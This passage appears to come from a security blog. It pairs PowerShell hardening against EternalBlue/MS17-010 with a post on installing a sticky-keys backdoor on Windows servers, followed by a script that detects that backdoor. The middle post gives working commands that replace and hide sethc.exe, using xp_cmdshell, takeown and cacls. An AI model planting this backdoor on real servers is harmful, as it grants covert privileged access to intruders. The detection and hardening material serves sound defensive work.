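# Added example, not from the original post. Run elevated on Windows 2008 R2+.
# Assumptions: KB list for MS17-010 taken from the bulletin (superseded by later
# rollups); SMBv1 registry switch under LanmanServer\Parameters; rule names my own.

$LanmanParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Test-Ms17010Hotfix {
    # Assumed KBs: KB4012598 (XP/2003/Vista/2008), KB4012212 (7/2008 R2 security-only),
    # KB4012215 (7/2008 R2 monthly rollup). $true if any of them is installed.
    $kbs = 'KB4012598', 'KB4012212', 'KB4012215'
    $hit = Get-HotFix -ErrorAction SilentlyContinue | Where-Object { $kbs -contains $_.HotFixID }
    return [bool]$hit
}

function Get-Smb1State {
    # Returns 'Enabled' or 'Disabled'. 2012+ exposes the setting through the SMB
    # cmdlets; 2008 R2 only has the registry value (absent value = SMBv1 enabled).
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        if ((Get-SmbServerConfiguration).EnableSMB1Protocol) { return 'Enabled' } else { return 'Disabled' }
    }
    $v = (Get-ItemProperty -Path $LanmanParams -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($v -eq 0) { return 'Disabled' } else { return 'Enabled' }
}

function Disable-Smb1 {
    if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        # 2008 R2 / Windows 7: registry switch, effective once the Server service restarts (reboot)
        Set-ItemProperty -Path $LanmanParams -Name SMB1 -Type DWord -Value 0 -Force
    }
}

function Block-SmbInbound {
    # Item 2 above, for hosts that cannot be patched: block RPC, NetBIOS and SMB inbound.
    # netsh advfirewall exists on Vista/2008 and later; XP/2003 need the older
    # 'netsh firewall' syntax instead. Arguments are quoted so PowerShell passes the
    # comma-separated port list through as a single token.
    & netsh advfirewall firewall add rule 'name=BlockInboundRpcNetbiosSmbTcp' 'dir=in' 'action=block' 'protocol=TCP' 'localport=135,139,445' | Out-Null
    & netsh advfirewall firewall add rule 'name=BlockInboundNetbiosNsUdp' 'dir=in' 'action=block' 'protocol=UDP' 'localport=137' | Out-Null
}

# Report first, change second
"MS17-010 hotfix present: $(Test-Ms17010Hotfix)"
"SMBv1 state:             $(Get-Smb1State)"
if ((Get-Smb1State) -eq 'Enabled') { Disable-Smb1 }
# Block-SmbInbound   # only on hosts that must not serve SMB to the network at all
```

Disabling SMBv1 removes the protocol that EternalBlue and the other SMB exploits listed by Smbtouch talk to, so it is the change that actually closes the hole on a host that cannot be patched; the firewall rules are a second layer for hosts like the DB server in the first post, which should never have had 445 reachable from outside.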

References


http://bobao.360.cn/news/detail/4118.html
http://bobao.360.cn/learning/detail/3743.html
http://www.freebuf.com/sectool/132076.html
http://bobao.360.cn/news/detail/4119.html

Installing a shift backdoor on a Windows server

Windows 2003


When connecting to a Windows remote desktop with the Remote Desktop Connection tool, pressing Shift five times before entering a username and password invokes c:\windows\system32\sethc.exe, so c:\windows\system32\sethc.exe is replaced with some other executable.
For example, here I make it launch Explorer; the installation steps are as follows:

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe /y
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe /y
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h

attrib +h adds the hidden attribute


Windows 2008


Windows 2008 has stricter permission settings; for example, replacing sethc.exe directly through xp_cmdshell fails for lack of permission, as shown in the figure:

exec xp_cmdshell 'copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe /y'

Command to change the owner of all files, folders and subfolders under the directory to the administrators group:

exec xp_cmdshell 'takeown /f c:\windows\system32\sethc.* /a /r /d y'

Grant SYSTEM full control
cacls c:\windows\system32\sethc.exe /T /E /G system:F

Then the copy goes through

Bringing up a DOS window through the shift backdoor

However, on Windows 2008, replacing sethc.exe with explorer.exe does not bring up an Explorer window.
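As an added example (not code from the original post), the PowerShell below checks a server for the modification this post describes. A genuine sethc.exe carries OriginalFilename "sethc.exe" in its version resource, while a copied cmd.exe or explorer.exe keeps its own name and is byte-identical to the source file; the post also hides the replaced file and, on 2003, overwrites the dllcache copy, so both of those are checked too. It assumes it runs elevated, that the host is a Windows build whose sethc.exe reports that OriginalFilename (compare against a known-good host of the same build first), and the function names are my own. The Image File Execution Options check at the end covers the registry-only variant of the same trick, where the Debugger value redirects sethc.exe to another program without touching the file.

```powershell
# Added example, not from the original post. Detects a replaced or redirected
# sethc.exe. Run elevated. Assumes the genuine sethc.exe on this build reports
# OriginalFilename sethc.exe; function names are my own.

function Get-FileSha256([string]$Path) {
    # Get-FileHash needs PowerShell 4+; hash through .NET so this runs on 2008 R2 / PS 2.0
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs = [System.IO.File]::OpenRead($Path)
    try { ($sha.ComputeHash($fs) | ForEach-Object { $_.ToString('x2') }) -join '' }
    finally { $fs.Close() }
}

function Test-StickyKeysBackdoor {
    $sys32 = Join-Path $env:windir 'System32'
    $findings = @()

    # Hashes of the binaries that typically get copied over sethc.exe
    $sources = @{}
    foreach ($src in (Join-Path $sys32 'cmd.exe'), (Join-Path $env:windir 'explorer.exe'), (Join-Path $sys32 'taskmgr.exe')) {
        if (Test-Path $src) { $sources[$src] = Get-FileSha256 $src }
    }

    # system32\sethc.exe on every version; dllcache\sethc.exe is the 2003-era WFP copy the post overwrites
    foreach ($t in (Join-Path $sys32 'sethc.exe'), (Join-Path $sys32 'dllcache\sethc.exe')) {
        if (-not (Test-Path $t)) { continue }
        $fi = Get-Item -Force $t          # -Force: the post sets +h, so the file may be hidden
        $h  = Get-FileSha256 $t
        foreach ($src in $sources.Keys) {
            if ($sources[$src] -eq $h) { $findings += "$t is a byte-identical copy of $src" }
        }
        $orig = $fi.VersionInfo.OriginalFilename
        if ($orig -ne 'sethc.exe') { $findings += "$t reports OriginalFilename '$orig' instead of sethc.exe" }
        if (($fi.Attributes -band [System.IO.FileAttributes]::Hidden) -ne 0) { $findings += "$t has the hidden attribute set" }
    }

    # Registry-only variant: an IFEO Debugger entry launches another program in place of sethc.exe
    $ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
    $dbg = (Get-ItemProperty -Path $ifeo -Name Debugger -ErrorAction SilentlyContinue).Debugger
    if ($dbg) { $findings += "IFEO Debugger for sethc.exe is set to '$dbg'" }

    return ,$findings
}

$result = Test-StickyKeysBackdoor
if ($result.Count -eq 0) { 'sethc.exe looks intact' } else { $result }
```

The takeown and cacls steps in the 2008 section are themselves a useful signal: ownership of a file under system32 passing from TrustedInstaller to Administrators, and a SYSTEM full-control ACE added to sethc.exe, do not happen during normal operation, so a periodic ownership check on sethc.exe (Get-Acl on the path, comparing the Owner field to a known-good host) catches the preparation step even before the file is replaced.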